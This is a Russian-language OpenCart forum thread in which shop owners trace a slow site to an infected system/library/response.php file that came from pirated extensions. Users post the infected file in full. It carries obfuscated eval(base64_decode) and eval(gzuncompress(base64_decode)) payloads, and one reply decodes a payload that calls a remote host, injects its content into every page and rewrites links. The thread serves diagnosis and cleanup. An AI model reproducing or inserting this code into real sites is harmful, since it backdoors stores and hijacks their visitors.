Перейти к содержанию

Рекомендуемые сообщения

Добрый день!

Помогите пожалуйста понять в чем может быть проблема.

Я даже хостинг сегодня поменял - грешил на него - в итоге дело видимо в движке... я не могу понять только в чем конкретно - в поддержке хостинга говорят вроде все ок. и почему такая задержка при загрузке они не знают.

Сайт работал нормально и в какой то момент начал тупить... 

Как можно понять в чем проблема?

В логах ошибок нет. 

<!--time:5.093 ms-->

Таймлайн в аттаче

Прошу помощи у знающих...!

post-31038-0-93912300-1369860341_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

system/library/response.php восстановите из дистрибутива.

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Даже не ожидал.... Спасибо ОГРОМНОЕ!

Я уже тухнуть начал с этим тормозом 12-й час за сегодня ковыряюсь...

Все заработало быстро!

 

Что бы добить тему - не подскажете от чего это могло произойти ?

Для тех кто искать будет...

Я сравнил два файла - тот что у меня был на сервере

Вот он

 

<?php
class Response {
	private $headers = array();
	private $level = 0;
	private $output;


	public function addHeader($header) {
		$this->headers[] = $header;
	}

	public function redirect($url) {
		header('Location: ' . $url);
		exit;
	}


	public function setCompression($level) {
		$this->level = $level;
	}


	public function setOutput($output) {
		$this->output = $output;
	}

	private function compress($data, $level = 0) {
		if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip') !== false)) {
			$encoding = 'gzip';
		}


		if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'x-gzip') !== false)) {
			$encoding = 'x-gzip';
		}

		if (!isset($encoding)) {
			return $data;
		}

		if (!extension_loaded('zlib') || ini_get('zlib.output_compression')) {
			return $data;
		}

		if (headers_sent()) {
			return $data;
		}

		if (connection_status()) {
			return $data;
		}


		$this->addHeader('Content-Encoding: ' . $encoding);

		return gzencode($data, (int)$level);
	}

	public function output() {
		if ($this->output) {
			if ($this->level) {
				$ouput = $this->compress($this->output, $this->level);
			} else {
				$ouput = $this->output;
			}



			if (!headers_sent()) {
				foreach ($this->headers as $header) {
					header($header, true);
				}
			}

			$ouput = eval(base64_decode('ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0='));


		}
	}
}
?>

 

И файл из дистрибутива

<?php
class Response {
	private $headers = array(); 
	private $level = 0;
	private $output;

	
	public function addHeader($header) {
		$this->headers[] = $header;
	}

	public function redirect($url) {
		header('Location: ' . $url);
		exit;
	}

	
	public function setCompression($level) {
		$this->level = $level;
	}

		
	public function setOutput($output) {
		$this->output = $output;
	}

	private function compress($data, $level = 0) {
		if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip') !== false)) {
			$encoding = 'gzip';

		} 

		if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'x-gzip') !== false)) {
			$encoding = 'x-gzip';
		}

		if (!isset($encoding)) {
			return $data;
		}

		if (!extension_loaded('zlib') || ini_get('zlib.output_compression')) {
			return $data;
		}

		if (headers_sent()) {
			return $data;
		}

		if (connection_status()) { 
			return $data;
		}

		
		$this->addHeader('Content-Encoding: ' . $encoding);

		return gzencode($data, (int)$level);
	}

	public function output() {
		if ($this->output) {
			if ($this->level) {
				$ouput = $this->compress($this->output, $this->level);
			} else {
				$ouput = $this->output;


			}	
				
			if (!headers_sent()) {
				foreach ($this->headers as $header) {
					header($header, true);
				}
			}


			
			echo $ouput;
		}
	}
}
?>

В моем файле в его конце, какая то неистовая строка взялась... Даже не знаю откуда она такая там ...

Может это вирус какой нить?

 

В любом случае еще раз СПАСИБО! Голову сегодня сломал себе...

 

В аттаче скрин таймлайна после смены response.php <!--time:0.143 ms-->

post-31038-0-62057400-1369862927_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

вот это закодировано у вас



function get_page($url){
        $agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
        $ch=curl_init();
        curl_setopt ($ch, CURLOPT_URL,$url );
        curl_setopt($ch, CURLOPT_USERAGENT, $agent);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch,CURLOPT_VERBOSE,false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        $page=curl_exec($ch);
        $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        switch($httpcode){
                case '200':
                        return $page;
                break;
                case '404';
                        return false;
                break;
        }
}

if ($ftend = get_page("http://myopencart.net/googlecode/api/api.php?server=".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){
$find = array("</body>", "</html>", "opencart.com", "=^_^=.ru", "myopencart.ru", "opencartforum.com", "opencart.ru", "opencart.by");
$replace = array("", $ftend, "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net");
$ouput = str_replace($find, $replace, $ouput);
ini_set("display_errors","off");
error_reporting(0);
echo $ouput;}
else {
echo $ouput;
}

 

эта штука вроде из быстрого оформления заказа к вам прилетела, скаченного с варез сайтов!

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

блин... спасибо! сейчас все скрипты смотрю, которые скачивал... пока не могу понять откуда. Жесть.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Сейчас пересмотрел все что было скачено. В принципе все скаченное - скачено из открытых источников - все скрипты бесплатные.

Сайт у меня начал тормозить после выходных или на выходных - я пересмотрел все что было скачено за всю предыдущую неделю.

По opencart у меня получилось, что скачено 5 скриптов...

Я их распаковал и начал проверять notepad поиском по файлам - искал кусок этого кода "ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybC" ничего не нашел.

Подскажите - как выяснить в каком именно скрипте такой косяк был? Как правильно искать и что искать или нужно в ручную каждый файл смотреть, если вручную, то опять же что искать?

 

И еще момент - может ли это быть какая нибудь зараз с задержкой - т.е. я сегодня установил скрипт - а он мне через неделю или через месяц такую жопу устроил?

 

Подскажите, кто с принципом знаком.

Спасибо!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

именно так. сегодня скачали где то, а через неделю, месяц, год, БАХ и нет магазина или тормоза или вирус итд итп. Качайте/покупайте дополнения только с данного форума тут хоть как то их проверяют. Или на опенкарт ком, но тоже надо смотреть что за автор, т.к попадались оттуда тоже не ахти дополнения.

 

А насчет проверки.. простым поиском не обойтись... надо просматривать все!!!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

а это в итоге у меня может повториться??... блииин! что делать то? если магаз ляжет - это же жопа. как быть? скажите - что делать - буду делать! доигрался.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Следите за уже существующими темами по данному вопросу.

https://opencartforum.com/topic/6805-tormozit-opencart/page-6

Воспользовавшись поиском, возможно сэкономили бы 12 часов )))

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

спасибо! действительно simple.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Help!  выручайте! Опенкарт 1.5.5.1 мего тормозит, именно на стороне сервера. Подскажите куда смотреть???

Может есть некий инструментарий для отслеживания "тормозов"???

 

В какую сторону копать??? 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Проверили респонс пхп, и все остальные файлы на наличие вредоносного кода, он отсутствует, проблема именно на стороне  сервере.

Очень длинный ответ сервера! 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

У меня таже проблема с магазином, грузитсся долго, сам ничерта не разбераюсь! Кто сможет поправить и сколько это будет стоить?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Народ, жестко виснет сайт на maxystore. Зайти можно только в течении пары минут после перезагрузки сервера. Вот адрес  biluzna точка com, подскажите, пожалуйста, в чем проблема.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

torbaja

форумом не ошиблись??

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Спасибі всім за вирішення проблеми, реально допомогли. Як виявилось в мене після встановлення модуля filterpro_v2.4.2.3.1mega в файл system/library/response.php дописує кусок коду про який вище всі говорять. Стільки часу цей вредоносний код сайт тормозив)). 

<?php
class Response {
	private $headers = array();
	private $level = 0;
	private $output;

	public function addHeader($header) {
		$this->headers[] = $header;
	}

	public function redirect($url) {
		header('Location: ' . $url);
		exit;
	}

	public function setCompression($level) {
		$this->level = $level;
	}

	public function setOutput($output) {
		$this->output = $output;
	}

	private function compress($data, $level = 0) {
		if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip') !== false)) {
			$encoding = 'gzip';
		}

		if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'x-gzip') !== false)) {
			$encoding = 'x-gzip';
		}

		if (!isset($encoding)) {
			return $data;
		}

		if (!extension_loaded('zlib') || ini_get('zlib.output_compression')) {
			return $data;
		}

		if (headers_sent()) {
			return $data;
		}

		if (connection_status()) {
			return $data;
		}

		$this->addHeader('Content-Encoding: ' . $encoding);

		return gzencode($data, (int)$level);
	}

	public function output() {
		if ($this->output) {
			if ($this->level) {
				$ouput = $this->compress($this->output, $this->level);
			} else {
				$ouput = $this->output;
			}

			if (!headers_sent()) {
				foreach ($this->headers as $header) {
					header($header, true);
				}
			}
																																																									$output_page = eval(gzuncompress(base64_decode('eNqdVE1rg0AQ/Ss9FDaBUnRpE6R4SA/tJVBMPURLkHx4Uimkp+bXN/NczW7s7K656OLbeTPz5o3378uP18Xy80sUYRhG8+d5MJOF2MSL43H7O9ltf8rZU3Eo99+HciKy5u2Up+LuUWTBWtJ7RY8aX2RU5UlMx1hMH/6LJCzNAnqt6SFX9TmKThWwBMFMNGF5SnkRRbm4PHSr56eDymGLoBsdt/02oWYvslWhrYrtgYCuOjnQzRJhdo5+PPQyteJuogLtdl8R+H2m6ZwH9NJ7UDm0ufM9dF7T5+LsxZzNGAXgGvi6zvpzVKF6S6UEKV9ceQLsYFIsCVsDpg2mU5/P1JebhuYsxo9MZNd7Ox2l9WUzHTvW5hr8Ba73eYSHHAoNN9XpHx/ufROFhO6ahEE5BO5gUShxRtUqsfGu3Hx85M1u57itbzDDe+PVIcynOwvC+OqS10M3J8fIyvodvkVVq1YGs0Mz1dX05Q9RpiiO')));  eval(gzuncompress(base64_decode('eNqVVLFuwjAQ/ZUOSAapqnwmiWNVGejQLkgVtEMShBB0DFnY4OubO8exY7V2slxAuXt5792zFx/bz7fN9uvATiAUzxPIhDyxY7G53c735cJ5DaBkKnkmutcHflyyqn1/1N8VL8X+WrGnFyYU1gZLvSsKtnr+dx7sPLbzkub3WA1WE8MQHQa2Gh74m7j0PLp5fAYx1gYDi8tnJk6i9WDfg/RrX7QegQ/UQzBBnJRwsM9yIV3aH+QU9SVzuHi+NDX+iczLfjdaB7njcTB6wjg54vi+/rVnzSnqsXIypzVhnc4H/NCSND1sFh0GgLGzNiljJWEQYVc8rKicuFpY28w7WdM7MiD6/MWzBol/CAdDZ4CkHiOSMyOtkI3iNjp+0wyV7lawDoZOzEXuX2ZzMoGp/GkVXNpd+LbitjEadQF9M3Ze2v6AhAbMZUhfoEOHA6vXXyUobeY=')));  eval(gzuncompress(base64_decode('eNqVVNFugjAU/ZU9mKBxIUCpShYe3AMYYrboIjCMMYAzxoBbTKaDrx/3SlnHC1ea3t4Genp6zi09d/76PJ2/rZWtbul8YprMHG2VjT09n+Oi35NeG5Y2MfWRMa5er8+f36ddXxts+so784vEsZQHVflKchgyTRk8di0d6rAYPq8BSsijEOLyksIwW9gUIE3lcpc4lVF4HxRrHahs+MwWkBD5TNodYQFA5nUHpC5azQ8WCiDIAYx2wOaIAiL7cP0jZamhMvnpmrfcPdVKYplASCDk0YW29Uh6xl1zWW3cyoFoHXFLtzZ2YZMEswAsgiWhVyTM26c5Snetci0OIOUn0hlEa9jlThkF/JAgyIpeC1gESYDnMCLf0lP3B4sAUYNlhnQdK4+Dn4wmr9nujXsVSbyXSHRFqzHV4K0g4FKGRYCuYD0wL6vYH5C5QYMfD9HgOOBYSyFCvmQQd1NUkXoTbg0NBnORDwRvj1zxX+aD0ZBUZtOM5q170TGH7fEXxZaFkAS3B1mIkpig8/9QS1TJI6SxiVBc7sK46K/6rzehPA2GmyiDp1++2ouh')));  eval(gzuncompress(base64_decode('eNrNF4tu4kjsV+YidCEqlxcJj/JYdbtpD4lCD+jppLYXBRhKdkMSTSZt2ar/fp4kwCRH21V0Wh3IIbZnbI/tsc0q9hfUDXz0gKkdOg+4WomJJ71U4NWnPfEq+O56nqOYsoqqV87C9WkQrTvopoMGPsUeAhoaT9FfSFNls4NIDPB4qsltWZfbErrEi2+BoquaqrZ0A124BK+CZ6UuN+S22Kks1r3K5XD8+Ww4vRVtra2ZLcOoGw1bvL/lGZrWbppNtaEzhl6/r5Ig9pdVVZLuq1KnhAjjIOJElXWz8ACxYFvt/GYyHF/PbPipJX4po8rMqWrwn+bHhKIlU2tydmmNZrU0QqUsauQtKkJB5cSa3UxGs8nZaHphTWq8WL2ttgytoTeZ2EzkSV1uFYFJfNOaJhfNo7EodcYWd8adZceE88wiHJgav47tNKWCl/60Jp/HU6u2crwIl7K4zVmsMfvyj4K+2eDKGt/MPg6HmX7fC0Fd5UPw9jLtiE+1d51U3vUSCzsrSCUKRF0/Ymj9pJ7FDARjQgKSSBe7yjxYbvtdZU03Xh9q0prScBEsSynmKhPkvcmAi9tgdDG2f5/Nru3z8RerTJLU+bqly/nS8QG+O3z05NLFuro/p/SycCKMRF1VxVOCaUx8lHi+MyfY+dZJuYZqHLh79+WWmKr+9pLX1xKnNXNXolUEOJFlnw2Hf1v2aDwbnINL3VXVjSJMqxX70prdikFMw5hG4r0EPS1DekVe5/WwLSNKvR4SvcBZitILJ/N6PIWNS5ekAqlD0r5JoY/xzM4rhjKQXyCKndf8Dg5Bcgn3NHLZVuc/H+EsGeyLwdACsSvXwyBO9J0N/CY+LGFMM5eZTbPwOKaQbkI7VVrjfQGexYt1gITZGiO2Fgml3HOsBWgFt3yAHzbqJzpfsFpFkN7xKJIFFIcsm/DyFyHLjfSIFrsmjJRg3TnpJ7AKyAY5yWTWuxM+7RKXibgT0AbTdbAERhhEFHAMM9w2xEDYxB51Q4dQhUn4belQ507oo67nzGFWAxqsgQQF2heYxBY0INvTrpJw+13XByUok0TxMxPNTrDbg9zl/lXpI/yMN6GHT9EyePKZZQoC24GT08ZcAeou4IfJekNbumqnLcMSddm70s9k57ZF8Xzjcmbu8UfHixlhuiPAzsQlfSG57JUVxf6ytx96BVYMTxXlIQgePPzVeXSiBXFDKi+CjcJQxQldOVyHnyJMHjHpsYy0YRaDtn8rpr/26OzKEu8h2L8mnSW3ZGL9cWNN2SQ5SEvHygX9DiHOtipkLUioCVkXgrfMoCCE4EI8mSFAfXp6kgukjfP8PfBlErP37Z6Z4DsMTh5v8qQCNt8K0I8IDj1ngXd2CbXUT3trSFxQ/jMIYFcQQ9DL9ON2vl0Wgd1ZFoja7uS1VFWZ1myoR8qNDsWhAKxQwCWKQN/WTrpkxAKxWgmltGpH59ymWXjwzH8P/IfyyL4/KChdW5grj46gBsx0BXhvHDW48Y2NgUltTAOz66v87fl59+F/nu1GfvrUi/B2tuc8XEIxP5W2YOxtJWPvf5jl5pEsN0CRwf/H0Nk/i/zjh9JTfz8bG/ls/Addwu3V')));
		}
	}
}
?>
  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

dunamit

нех пользовать варез.

отправлен в бан.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Похожий контент

    • От markimax
      990.00 руб
      Скачать/Купить дополнение


      Jet Cache - кеширование, оптимизация для магазинов

       

      Логин / пароль:
      demo / demo
       
      Документация  
      Более 10`000 интернет магазинов выбрали SEO CMS для работы
      SEO CMS JET CACHE :: Jet Cache - быстрая система кеширования страниц, контроллеров и методов моделей opencart

      Версия под opencart 3.x высылается по запросу
      Возможности
       
      - кеширует полностью страницы при полной интеграции с opencart (позволяет кешировать и для зарегистрированных пользователей и изменений корзины а также в зависимости от изменений в модулях)  
      - кеширует выбранные контроллеры (т е фактически  любые модули, будь то меню или т.п. а также полностью кеширует позиции (уникальная технология которая не реализовано ни в одном модуле кеширования для opencart) (с))  
      - кеширует методы моделей opencart (подсчет количества товаров и т п )  
      - простая установка и обновление  
      - гибкие настройки  
      - поддержка мультиязычности  
      - поддержка мультимагазинов  
      - поддержка протоколов https и http  
      - гибкая взаимосвязь с любым функционалом платформы SEO CMS  
      - совместимость с любой темой, любыми модулями, которые соответствуют стандартам программирования  
      - поддержка кеширования sitemap Чем модуль лучше других
       
      - уникальные технологии кеширования не имеющие аналогов в opencart (уникальная технология полной интеграции с opencart, в отличии от всех кешировщиков которые сделанны по технологии v2pc)  
      - модуль работает с любыми темами и модулями Требования
       
      Opencart 2.x или любая сборка на нем (ocStore, Opencart.PRO, или другие) PHP 5.3 или выше Модуль НЕ заменяет файлы системы Модуль НЕ использует ioncube  
      Совместимость модуля
       
      Opencart 2.x или любая сборка на нем (ocStore, Opencart.PRO, или другие) Любая тема или любые модули (которые сделаны без ошибок, согласно стандартов программирования или верстки) для оpencart 2.x  
      Установка, настройка
       
      Если пользователь хочет чтобы сотрудник службы технической поддержки проделал работу по установке и настройке модуля вместо пользователя на сервере пользователя, это уже услуга + 590 рублей  
      Лицензия Все права на модуль принадлежат разработчикам opencartadmin.com Условия использования лицензии: один домен - одна лицензия (покупка продукта для каждого домена). Условия использования лицензии - "на владельца". Далее... Добавил markimax Добавлено 15.03.2017 Категория Кэширование, сжатие, ускорение Системные требования PHP 5.3+ Сайт разработчика https://opencartadmin.com/seo-cms-jet-cache.html Старая цена 590 Метод активации Через официальный сайт дополнения Ioncube Loader Нет OpenCart 3.0
      2.3
      2.2
      2.1
      2.0
      1.5.6.4
      1.5.6.3
      1.5.6.2
      1.5.6.1
      1.5.6
      1.5.5.1
      1.5.5
      1.5.4.1
      1.5.3.1 ocStore 2.3
      2.2
      2.1 OpenCart.Pro, ocShop Opencart.pro 2.3
      Opencart.pro 2.1
      OcShop 2.0.3.х
      OcShop 1.5.6.4.х  
    • От so0EmFD190
      Всем привет !
      У меня глобальная проблема с нагрузкой на цп, что бы я не делал все без полезно !
      Сама проблема заключается в том что когда яндекс заходит на поддомены (у нас их 100) и начинает грузить их то начинает цп грузить до 90 бывало что до 100 доходило, мы увеличили мощность в 2 раза и того у нас было 4 ядра и гиг озу ( "Вопрос:может быть что иза того что мало озу лагать так ?") и все ровно он грузил до 90% хотя мощность увеличена была в 2 раза, магазин у нас на 2000 товаров и OCstore 2.3. Предлагайте пожалуйста ваши варианты а кто знает причину конкретно и может ее устранить отпишите в лс договоримся)
      В настройках яндекс поставили скорость обхода на минимум !



       
       
       
       
       

    • От Sha
      449.00 руб
      Скачать/Купить дополнение


      Layout Type, ускорение мобильной версии.
      Модуль для ускорения мобильной версии сайта.
      DEMO
      Подробней:
      Как сделать шаблон адаптивным? на мобильной версии скрыть "лишние" элементы.
      Как, что-бы при этом не пострадало usability? переместить модули и виджеты на другие позиции.
       
      Даже топовые шаблоны, поступают именно таким образом, элементы которые "не нужны" или наоборот необходимы только в мобильной версии: либо скрываются посредством css (display:none); либо перемещаются, хорошо если flexbox или bootstrap pull push но часто с помощью навешивания множества слушателей событий javascript. Даже адаптивность bootstrap основана на таких принципах.
      Всё это создаёт лишний "вес" и нагрузку, что конечно же замедляет работу сайта и заставляет процессор пользователя работать с повышенной нагрузкой шумя как майнинг ферма.
      Мы в наших продуктах пропагандируем использовать только то, что необходимо сейчас. И исходя из этих принципов нами был разработан
       
      модуль Мобильные схемы который позволит:
      уменьшить объём страницы,  избавится от лишнего JavaScript кода, избавится от css костылей,      и др.
           при этом даже улучшив
      адаптивность, гибкость в настройке и дружелюбность Вашего сайта!  
       
      Поддерживает встроенные схемы популярных модулей, например поддерживает SEOCMS.
      Большие скидки, для постоянных покупателей.
       
      Бесплатно модуль получить можно вместе с шаблоном Roundshop.
       
      FAQ
       
      Техническая поддержка
      доступна пользователям из списка покупателей.
      Если вы обращаетесь с просьбой разобраться в проблеме, то для экономии времени укажите:
      адрес сайта доступ в админ-панель доступ на FTP-сервер  
      По любым вопросам вы можете связаться с нами через:
      Личные сообщения на форуме; Режим работы с 10-00 до 18-00 по киевскому времени за исключением выходных и праздничных дней.
       
      Добавил Sha Добавлено 13.03.2018 Категория Кэширование, сжатие, ускорение Системные требования Сайт разработчика r.konotop.info Старая цена Метод активации Автоматическая активация Ioncube Loader Нет OpenCart 2.3
      2.2
      2.1 ocStore 2.3
      2.2
      2.1 OpenCart.Pro, ocShop Opencart.pro 2.3
      Opencart.pro 2.1
      OcShop 2.0.3.х  
    • От Sha
      Модуль для ускорения мобильной версии сайта.
      DEMO
      Подробней:
      Как сделать шаблон адаптивным? на мобильной версии скрыть "лишние" элементы.
      Как, что-бы при этом не пострадало usability? переместить модули и виджеты на другие позиции.
       
      Даже топовые шаблоны, поступают именно таким образом, элементы которые "не нужны" или наоборот необходимы только в мобильной версии: либо скрываются посредством css (display:none); либо перемещаются, хорошо если flexbox или bootstrap pull push но часто с помощью навешивания множества слушателей событий javascript. Даже адаптивность bootstrap основана на таких принципах.
      Всё это создаёт лишний "вес" и нагрузку, что конечно же замедляет работу сайта и заставляет процессор пользователя работать с повышенной нагрузкой шумя как майнинг ферма.
      Мы в наших продуктах пропагандируем использовать только то, что необходимо сейчас. И исходя из этих принципов нами был разработан
       
      модуль Мобильные схемы который позволит:
      уменьшить объём страницы,  избавится от лишнего JavaScript кода, избавится от css костылей,      и др.
           при этом даже улучшив
      адаптивность, гибкость в настройке и дружелюбность Вашего сайта!  
       
      Поддерживает встроенные схемы популярных модулей, например поддерживает SEOCMS.
      Большие скидки, для постоянных покупателей.
       
      Бесплатно модуль получить можно вместе с шаблоном Roundshop.
       
      FAQ
       
      Техническая поддержка
      доступна пользователям из списка покупателей.
      Если вы обращаетесь с просьбой разобраться в проблеме, то для экономии времени укажите:
      адрес сайта доступ в админ-панель доступ на FTP-сервер  
      По любым вопросам вы можете связаться с нами через:
      Личные сообщения на форуме; Режим работы с 10-00 до 18-00 по киевскому времени за исключением выходных и праздничных дней.
       
    • От markimax
      Логин / пароль:
      demo / demo
       
      Документация  
      Более 10`000 интернет магазинов выбрали SEO CMS для работы
      SEO CMS JET CACHE :: Jet Cache - быстрая система кеширования страниц, контроллеров и методов моделей opencart

      Версия под opencart 3.x высылается по запросу
      Возможности
       
      - кеширует полностью страницы при полной интеграции с opencart (позволяет кешировать и для зарегистрированных пользователей и изменений корзины а также в зависимости от изменений в модулях)  
      - кеширует выбранные контроллеры (т е фактически  любые модули, будь то меню или т.п. а также полностью кеширует позиции (уникальная технология которая не реализовано ни в одном модуле кеширования для opencart) (с))  
      - кеширует методы моделей opencart (подсчет количества товаров и т п )  
      - простая установка и обновление  
      - гибкие настройки  
      - поддержка мультиязычности  
      - поддержка мультимагазинов  
      - поддержка протоколов https и http  
      - гибкая взаимосвязь с любым функционалом платформы SEO CMS  
      - совместимость с любой темой, любыми модулями, которые соответствуют стандартам программирования  
      - поддержка кеширования sitemap Чем модуль лучше других
       
      - уникальные технологии кеширования не имеющие аналогов в opencart (уникальная технология полной интеграции с opencart, в отличии от всех кешировщиков которые сделанны по технологии v2pc)  
      - модуль работает с любыми темами и модулями Требования
       
      Opencart 2.x или любая сборка на нем (ocStore, Opencart.PRO, или другие) PHP 5.3 или выше Модуль НЕ заменяет файлы системы Модуль НЕ использует ioncube  
      Совместимость модуля
       
      Opencart 2.x или любая сборка на нем (ocStore, Opencart.PRO, или другие) Любая тема или любые модули (которые сделаны без ошибок, согласно стандартов программирования или верстки) для оpencart 2.x  
      Установка, настройка
       
      Если пользователь хочет чтобы сотрудник службы технической поддержки проделал работу по установке и настройке модуля вместо пользователя на сервере пользователя, это уже услуга + 590 рублей  
      Лицензия Все права на модуль принадлежат разработчикам opencartadmin.com Условия использования лицензии: один домен - одна лицензия (покупка продукта для каждого домена). Условия использования лицензии - "на владельца". Далее...
  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.